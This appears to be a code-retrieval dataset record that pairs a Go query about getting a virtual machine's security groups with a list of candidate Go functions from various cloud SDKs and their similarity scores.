*serialize.JSONProperties,\n\t\t\t\t\t\t) fail.Error {\n\t\t\t\t\t\t\tabstractSubnet, ok := clonable.(*abstract.Subnet)\n\t\t\t\t\t\t\tif !ok {\n\t\t\t\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.Subnet' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif abstractSubnet.InternalSecurityGroupID != \"\" {\n\t\t\t\t\t\t\t\tsg, derr = LoadSecurityGroup(cleanupContextFrom(ctx), svc, abstractSubnet.InternalSecurityGroupID)\n\t\t\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t\t\terrs = append(errs, derr)\n\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\tderr = sg.UnbindFromHost(cleanupContextFrom(ctx), instance)\n\t\t\t\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t\t\t\terrs = append(errs, derr)\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\treturn nil\n\t\t\t\t\t\t})\n\t\t\t\t\t\tif deeperXErr != nil {\n\t\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(deeperXErr, \"cleaning up on failure, failed to unbind Security Group '%s' from Host\", sgName))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tif len(errs) > 0 {\n\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(fail.NewErrorList(errs), \"failed to unbind Subnets Security Group from Host '%s'\", sg.GetName(), req.ResourceName))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\tfor _, v := range req.Subnets {\n\t\t\t\t// Do not try to bind defaultSubnet on gateway, because this code is running under a lock on defaultSubnet in this case, and this will lead to deadlock\n\t\t\t\t// (binding of gateway on defaultSubnet is done inside Subnet.Create() call)\n\t\t\t\tif req.IsGateway && v.ID == defaultSubnetID {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\totherSubnetInstance, innerXErr := LoadSubnet(ctx, svc, \"\", v.ID)\n\t\t\t\tinnerXErr = debug.InjectPlannedFail(innerXErr)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn innerXErr\n\t\t\t\t}\n\n\t\t\t\tvar otherAbstractSubnet *abstract.Subnet\n\t\t\t\tinnerXErr = otherSubnetInstance.Inspect(ctx, func(\n\t\t\t\t\tclonable data.Clonable, _ *serialize.JSONProperties,\n\t\t\t\t) fail.Error {\n\t\t\t\t\tvar ok bool\n\t\t\t\t\totherAbstractSubnet, ok = clonable.(*abstract.Subnet)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.Subnet' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t\t}\n\t\t\t\t\t_ = otherAbstractSubnet\n\n\t\t\t\t\treturn nil\n\t\t\t\t})\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn innerXErr\n\t\t\t\t}\n\n\t\t\t\tsafe := false\n\n\t\t\t\t// Fix for Stein\n\t\t\t\t{\n\t\t\t\t\tst, xerr := svc.GetProviderName()\n\t\t\t\t\tif xerr != nil {\n\t\t\t\t\t\treturn xerr\n\t\t\t\t\t}\n\t\t\t\t\tif st != \"ovh\" {\n\t\t\t\t\t\tsafe = true\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif cfg, xerr := svc.GetConfigurationOptions(ctx); xerr == nil {\n\t\t\t\t\tif aval, ok := cfg.Get(\"Safe\"); ok {\n\t\t\t\t\t\tif val, ok := aval.(bool); ok {\n\t\t\t\t\t\t\tsafe = val\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif otherAbstractSubnet.InternalSecurityGroupID != \"\" {\n\t\t\t\t\tlansg, innerXErr = LoadSecurityGroup(ctx, svc, otherAbstractSubnet.InternalSecurityGroupID)\n\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to load Subnet '%s' internal Security Group %s\", otherAbstractSubnet.Name, otherAbstractSubnet.InternalSecurityGroupID)\n\t\t\t\t\t}\n\n\t\t\t\t\tif !safe {\n\t\t\t\t\t\tinnerXErr = svc.ChangeSecurityGroupSecurity(ctx, false, true, otherAbstractSubnet.Network, \"\")\n\t\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to change security group\")\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tinnerXErr = lansg.BindToHost(ctx, instance, resources.SecurityGroupEnable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to apply Subnet '%s' internal Security Group '%s' to Host '%s'\", otherAbstractSubnet.Name, lansg.GetName(), req.ResourceName)\n\t\t\t\t\t}\n\n\t\t\t\t\tif !safe {\n\t\t\t\t\t\tinnerXErr = svc.ChangeSecurityGroupSecurity(ctx, true, false, otherAbstractSubnet.Network, \"\")\n\t\t\t\t\t\tif innerXErr != nil {\n\t\t\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to change security group\")\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tlangID, err := lansg.GetID()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn fail.ConvertError(err)\n\t\t\t\t\t}\n\n\t\t\t\t\t// register security group in properties\n\t\t\t\t\titem := &propertiesv1.SecurityGroupBond{\n\t\t\t\t\t\tID: langID,\n\t\t\t\t\t\tName: lansg.GetName(),\n\t\t\t\t\t\tDisabled: false,\n\t\t\t\t\t\tFromSubnet: true,\n\t\t\t\t\t}\n\t\t\t\t\thsgV1.ByID[item.ID] = item\n\t\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}", "func (o GetLoadBalancersBalancerOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v GetLoadBalancersBalancer) []string { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (o *VirtualMachineToAlternativeRestoreOptions) GetNetworkSecurityGroupId() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.NetworkSecurityGroupId\n}", "func NewFiltersSecurityGroup() *FiltersSecurityGroup {\n\tthis := FiltersSecurityGroup{}\n\treturn &this\n}", "func (o GetVpcEndpointsEndpointOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v GetVpcEndpointsEndpoint) []string { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (o SecurityGroupRuleOutput) SourceSecurityGroupId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *SecurityGroupRule) pulumi.StringOutput { return v.SourceSecurityGroupId }).(pulumi.StringOutput)\n}", "func (a *Client) ListOpenstackSecurityGroupsNoCredentialsV2(params *ListOpenstackSecurityGroupsNoCredentialsV2Params, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*ListOpenstackSecurityGroupsNoCredentialsV2OK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewListOpenstackSecurityGroupsNoCredentialsV2Params()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"listOpenstackSecurityGroupsNoCredentialsV2\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v2/projects/{project_id}/clusters/{cluster_id}/providers/openstack/securitygroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &ListOpenstackSecurityGroupsNoCredentialsV2Reader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*ListOpenstackSecurityGroupsNoCredentialsV2OK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*ListOpenstackSecurityGroupsNoCredentialsV2Default)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (a *Adapter) SecurityGroupID() string {\n\treturn a.manifest.securityGroup.id\n}", "func NewSecurityGroupWithDefaults() *SecurityGroup {\n\tthis := SecurityGroup{}\n\treturn &this\n}", "func setSecurityGroups(c *cli.Context) error {\n\terr := checkArgCount(c, 2)\n\tif err != nil {\n\t\treturn err\n\t}\n\tid := c.Args().First()\n\titems := []string{}\n\tif c.Args()[1] != \"\" {\n\t\titems = regexp.MustCompile(`\\s*,\\s*`).Split(c.Args()[1], -1)\n\t}\n\tsecurityGroups := &photon.SecurityGroupsSpec{\n\t\tItems: items,\n\t}\n\n\tclient.Photonclient, err = client.GetClient(c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttask, err := client.Photonclient.Tenants.SetSecurityGroups(id, securityGroups)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = waitOnTaskOperation(task.ID, c)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (*ListSecurityGroupsResponse) Descriptor() ([]byte, []int) {\n\treturn file_yandex_cloud_vpc_v1_security_group_service_proto_rawDescGZIP(), []int{2}\n}", "func (*ListSecurityGroupsRequest) Descriptor() ([]byte, []int) {\n\treturn file_yandex_cloud_vpc_v1_security_group_service_proto_rawDescGZIP(), []int{1}\n}", "func (o *User) GetSchools() []string {\n\tif o == nil || o.Schools == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.Schools\n}", "func ParseListSecurityGroupsResponse(rsp *http.Response) (*ListSecurityGroupsResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &ListSecurityGroupsResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest struct {\n\t\t\tSecurityGroups *[]SecurityGroup `json:\"security-groups,omitempty\"`\n\t\t}\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func (o *FiltersSecurityGroup) GetInboundRuleSecurityGroupIds() []string {\n\tif o == nil || o.InboundRuleSecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.InboundRuleSecurityGroupIds\n}", "func (instance *Host) DisableSecurityGroup(ctx context.Context, sgInstance resources.SecurityGroup) (ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn fail.InvalidInstanceError()\n\t}\n\tif ctx == nil {\n\t\treturn fail.InvalidParameterError(\"ctx\", \"cannot be nil\")\n\t}\n\tif sgInstance == nil {\n\t\treturn fail.InvalidParameterError(\"sgInstance\", \"cannot be nil\")\n\t}\n\n\tsgName := sgInstance.GetName()\n\tsgID, err := sgInstance.GetID()\n\tif err != nil {\n\t\treturn fail.ConvertError(err)\n\t}\n\n\thid, err := instance.GetID()\n\tif err != nil {\n\t\treturn fail.ConvertError(err)\n\t}\n\n\tsvc := instance.Service()\n\txerr := instance.Alter(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Alter(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tvar asg *abstract.SecurityGroup\n\t\t\txerr := sgInstance.Inspect(ctx, func(clonable data.Clonable, _ *serialize.JSONProperties) fail.Error {\n\t\t\t\tvar ok bool\n\t\t\t\tif asg, ok = clonable.(*abstract.SecurityGroup); !ok {\n\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.SecurityGroup' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t}\n\n\t\t\t\treturn nil\n\t\t\t})\n\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\tif xerr != nil {\n\t\t\t\treturn xerr\n\t\t\t}\n\n\t\t\t// First check if the security group is not already registered for the Host with the exact same state\n\t\t\tvar found bool\n\t\t\tfor k := range hsgV1.ByID {\n\t\t\t\tif k == asg.ID {\n\t\t\t\t\tfound = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !found {\n\t\t\t\treturn fail.NotFoundError(\"security group '%s' is not bound to Host '%s'\", sgName, sgID)\n\t\t\t}\n\n\t\t\t{\n\t\t\t\t// Bind the security group on provider side; if security group not binded, considered as a success\n\t\t\t\txerr = svc.UnbindSecurityGroupFromHost(ctx, asg, hid)\n\t\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\t\tif xerr != nil {\n\t\t\t\t\tswitch xerr.(type) {\n\t\t\t\t\tcase *fail.ErrNotFound:\n\t\t\t\t\t\tdebug.IgnoreError2(ctx, xerr)\n\t\t\t\t\t\t// continue\n\t\t\t\t\tdefault:\n\t\t\t\t\t\treturn xerr\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// found, update properties\n\t\t\thsgV1.ByID[asg.ID].Disabled = true\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}" ]
[ "0.78226376", "0.7332117", "0.7003537", "0.68173736", "0.6815645", "0.680125", "0.6611973", "0.6508788", "0.6435931", "0.6419151", "0.64180756", "0.62360895", "0.62072957", "0.620509", "0.61870015", "0.6183983", "0.6111347", "0.60852593", "0.5942024", "0.5890465", "0.588067", "0.58705395", "0.5869431", "0.5866925", "0.58423114", "0.58291334", "0.58280015", "0.58177483", "0.58170253", "0.58054787", "0.578357", "0.5739102", "0.5735567", "0.56537795", "0.56468856", "0.5632324", "0.55974835", "0.5586635", "0.5569279", "0.5559676", "0.55466044", "0.55300975", "0.5509829", "0.5482391", "0.54798514", "0.5465981", "0.5458896", "0.5450767", "0.5442902", "0.5438666", "0.54307836", "0.54148906", "0.5394409", "0.53903544", "0.5378501", "0.53676635", "0.53646594", "0.53626156", "0.53579617", "0.53423387", "0.5310058", "0.53010464", "0.5300026", "0.5298873", "0.5295026", "0.5292969", "0.5242175", "0.5235478", "0.5229205", "0.52278787", "0.52251923", "0.5209064", "0.5208766", "0.5186057", "0.510003", "0.5097671", "0.50895905", "0.5089337", "0.50891644", "0.50568175", "0.5026597", "0.50177956", "0.5017078", "0.5012461", "0.5004082", "0.4994467", "0.49931243", "0.4982623", "0.4979165", "0.49758217", "0.495723", "0.49556723", "0.4951509", "0.495043", "0.49452308", "0.49396655", "0.49348152", "0.4926587", "0.49245116", "0.4923046" ]
0.7067831
2
GetSecurityGroupsOk returns a tuple with the SecurityGroups field value if set, nil otherwise and a boolean to check if the value has been set. NOTE: If the value is an explicit nil, `nil, true` will be returned
func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroupsOk() ([]CloudAwsSecurityGroupRelationship, bool) { if o == nil || o.SecurityGroups == nil { return nil, false } return o.SecurityGroups, true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CreateLoadBalancerRequest) GetSecurityGroupsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroups, true\n}", "func (o *FiltersVmGroup) GetSecurityGroupIdsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupIds, true\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupIdsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupIds, true\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupNamesOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroupNames == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupNames, true\n}", "func (o *CreateLoadBalancerRequest) GetSecurityGroups() []string {\n\tif o == nil || o.SecurityGroups == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroups\n}", "func (o *CloudAwsVirtualMachineAllOf) HasSecurityGroups() bool {\n\tif o != nil && o.SecurityGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CreateLoadBalancerRequest) HasSecurityGroups() bool {\n\tif o != nil && o.SecurityGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o InstanceOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringArrayOutput { return v.SecurityGroups }).(pulumi.StringArrayOutput)\n}", "func (client *AwsClientWrapper) GetSecurityGroups(machine *clusterv1alpha1.Machine) ([]string, error) {\n\tinstance, err := getRunningInstance(machine, client.client)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar groups []string\n\tfor _, groupIdentifier := range instance.SecurityGroups {\n\t\tif *groupIdentifier.GroupName != \"\" {\n\t\t\tgroups = append(groups, *groupIdentifier.GroupName)\n\t\t}\n\t}\n\treturn groups, nil\n}", "func (o *SecurityGroup) GetSecurityGroupIdOk() (*string, bool) {\n\tif o == nil || o.SecurityGroupId == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupId, true\n}", "func (o *FiltersSecurityGroup) GetOutboundRuleSecurityGroupIdsOk() (*[]string, bool) {\n\tif o == nil || o.OutboundRuleSecurityGroupIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.OutboundRuleSecurityGroupIds, true\n}", "func GetSecurityGroupInfo(sess *session.Session) (*ec2.DescribeSecurityGroupsOutput, error) {\n // snippet-start:[ec2.go.describe_security_groups.call]\n svc := ec2.New(sess)\n\n result, err := svc.DescribeSecurityGroups(nil)\n // snippet-end:[ec2.go.describe_security_groups.call]\n if err != nil {\n return nil, err\n }\n\n return result, nil\n}", "func (o *FiltersSecurityGroup) GetInboundRuleSecurityGroupIdsOk() (*[]string, bool) {\n\tif o == nil || o.InboundRuleSecurityGroupIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.InboundRuleSecurityGroupIds, true\n}", "func (o *FiltersSecurityGroup) GetOutboundRuleSecurityGroupNamesOk() (*[]string, bool) {\n\tif o == nil || o.OutboundRuleSecurityGroupNames == nil {\n\t\treturn nil, false\n\t}\n\treturn o.OutboundRuleSecurityGroupNames, true\n}", "func (o *GetSecurityGroupOK) IsSuccess() bool {\n\treturn true\n}", "func (o *FiltersSecurityGroup) GetInboundRuleSecurityGroupNamesOk() (*[]string, bool) {\n\tif o == nil || o.InboundRuleSecurityGroupNames == nil {\n\t\treturn nil, false\n\t}\n\treturn o.InboundRuleSecurityGroupNames, true\n}", "func (o *SecurityGroup) GetSecurityGroupNameOk() (*string, bool) {\n\tif o == nil || o.SecurityGroupName == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupName, true\n}", "func (o *FiltersVmGroup) HasSecurityGroupIds() bool {\n\tif o != nil && o.SecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (r *LaunchConfiguration) SecurityGroups() pulumi.ArrayOutput {\n\treturn (pulumi.ArrayOutput)(r.s.State[\"securityGroups\"])\n}", "func (o TopicRuleDestinationVpcConfigurationOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v TopicRuleDestinationVpcConfiguration) []string { return v.SecurityGroups }).(pulumi.StringArrayOutput)\n}", "func (a *Client) ListOpenstackSecurityGroups(params *ListOpenstackSecurityGroupsParams, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*ListOpenstackSecurityGroupsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewListOpenstackSecurityGroupsParams()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"listOpenstackSecurityGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/providers/openstack/securitygroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &ListOpenstackSecurityGroupsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*ListOpenstackSecurityGroupsOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*ListOpenstackSecurityGroupsDefault)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (c *ClientWithResponses) ListSecurityGroupsWithResponse(ctx context.Context) (*ListSecurityGroupsResponse, error) {\n\trsp, err := c.ListSecurityGroups(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn ParseListSecurityGroupsResponse(rsp)\n}", "func (instance *Host) ListSecurityGroups(ctx context.Context, state securitygroupstate.Enum) (list []*propertiesv1.SecurityGroupBond, ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\n\t// instance.RLock()\n\t// defer instance.RUnlock()\n\n\txerr := instance.Inspect(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Inspect(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tlist = FilterBondsByKind(hsgV1.ByID, state)\n\t\t\treturn nil\n\t\t})\n\t})\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\treturn list, nil\n}", "func (m *MockSecurityGroupServiceIface) ListSecurityGroups(p *ListSecurityGroupsParams) (*ListSecurityGroupsResponse, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListSecurityGroups\", p)\n\tret0, _ := ret[0].(*ListSecurityGroupsResponse)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (o *FiltersSecurityGroup) HasSecurityGroupIds() bool {\n\tif o != nil && o.SecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o TopicRuleDestinationVpcConfigurationPtrOutput) SecurityGroups() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *TopicRuleDestinationVpcConfiguration) []string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.SecurityGroups\n\t}).(pulumi.StringArrayOutput)\n}", "func (a *Client) ListOpenstackSecurityGroupsNoCredentials(params *ListOpenstackSecurityGroupsNoCredentialsParams, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*ListOpenstackSecurityGroupsNoCredentialsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewListOpenstackSecurityGroupsNoCredentialsParams()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"listOpenstackSecurityGroupsNoCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/projects/{project_id}/dc/{dc}/clusters/{cluster_id}/providers/openstack/securitygroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &ListOpenstackSecurityGroupsNoCredentialsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*ListOpenstackSecurityGroupsNoCredentialsOK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*ListOpenstackSecurityGroupsNoCredentialsDefault)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (o *FiltersSecurityGroup) HasSecurityGroupNames() bool {\n\tif o != nil && o.SecurityGroupNames != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *HostListener) ListSecurityGroups(ctx context.Context, in *protocol.SecurityGroupHostBindRequest) (_ *protocol.SecurityGroupBondsResponse, err error) {\n\tdefer fail.OnExitConvertToGRPCStatus(&err)\n\tdefer fail.OnExitWrapError(&err, \"cannot disable security group on host\")\n\tdefer fail.OnPanic(&err)\n\n\tif s == nil {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif in == nil {\n\t\treturn nil, fail.InvalidParameterError(\"in\", \"cannot be nil\")\n\t}\n\tif ctx == nil {\n\t\treturn nil, fail.InvalidParameterError(\"ctx\", \"cannot be nil\")\n\t}\n\n\tif ok, err := govalidator.ValidateStruct(in); err == nil && !ok {\n\t\tlogrus.Warnf(\"Structure validation failure: %v\", in) // FIXME: Generate json tags in protobuf\n\t}\n\n\thostRef, hostRefLabel := srvutils.GetReference(in.GetHost())\n\tif hostRef == \"\" {\n\t\treturn nil, fail.InvalidRequestError(\"neither name nor id given as reference of Host\")\n\t}\n\n\tjob, xerr := PrepareJob(ctx, in.GetHost().GetTenantId(), fmt.Sprintf(\"/host/%s/securitygroups/list\", hostRef))\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\tdefer job.Close()\n\n\ttracer := debug.NewTracer(job.Task(), tracing.ShouldTrace(\"listeners.host\"), \"(%s)\", hostRefLabel).WithStopwatch().Entering()\n\tdefer tracer.Exiting()\n\tdefer fail.OnExitLogError(&err, tracer.TraceMessage())\n\n\thostInstance, xerr := hostfactory.Load(job.Service(), hostRef)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tdefer hostInstance.Released()\n\n\tbonds, xerr := hostInstance.ListSecurityGroups(securitygroupstate.All)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tresp := converters.SecurityGroupBondsFromPropertyToProtocol(bonds, \"hosts\")\n\treturn resp, nil\n}", "func (a *Client) GetPlatformSecurityGroups(params *GetPlatformSecurityGroupsParams) (*GetPlatformSecurityGroupsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewGetPlatformSecurityGroupsParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"getPlatformSecurityGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/v1/platform_resources/security_groups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"http\", \"https\"},\n\t\tParams: params,\n\t\tReader: &GetPlatformSecurityGroupsReader{formats: a.formats},\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*GetPlatformSecurityGroupsOK), nil\n\n}", "func (o *GetSecurityGroupBadRequest) IsSuccess() bool {\n\treturn false\n}", "func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroups() []CloudAwsSecurityGroupRelationship {\n\tif o == nil {\n\t\tvar ret []CloudAwsSecurityGroupRelationship\n\t\treturn ret\n\t}\n\treturn o.SecurityGroups\n}", "func (o *SecurityGroup) HasSecurityGroupId() bool {\n\tif o != nil && o.SecurityGroupId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func SecurityGroups(groups ...string) RequestOptionFunc {\n\treturn func(body *RequestBody) error {\n\t\tbody.SecurityGroup = groups\n\t\treturn nil\n\t}\n}", "func checkSecurityGroupFlags() string {\n\tcheckResult := \"\"\n\tcheckResult += checkGroupId()\n\tcheckResult += checkProtocol()\n\tcheckResult += checkWay()\n\treturn checkResult\n}", "func (o *GetSecurityGroupNotFound) IsSuccess() bool {\n\treturn false\n}", "func (stg *securityTestGroup) getSecurityGroups(agent string) ([]security.NetworkSecurityPolicy, error) {\n\tvar sgplist []security.NetworkSecurityPolicy\n\tstatus, err := stg.authAgentClient.Req(\"GET\", \"https://\"+agent+\":\"+globals.AgentProxyPort+\"/api/sgs/\", nil, &sgplist)\n\tif err != nil || status != http.StatusOK {\n\t\treturn nil, fmt.Errorf(\"Error getting SG 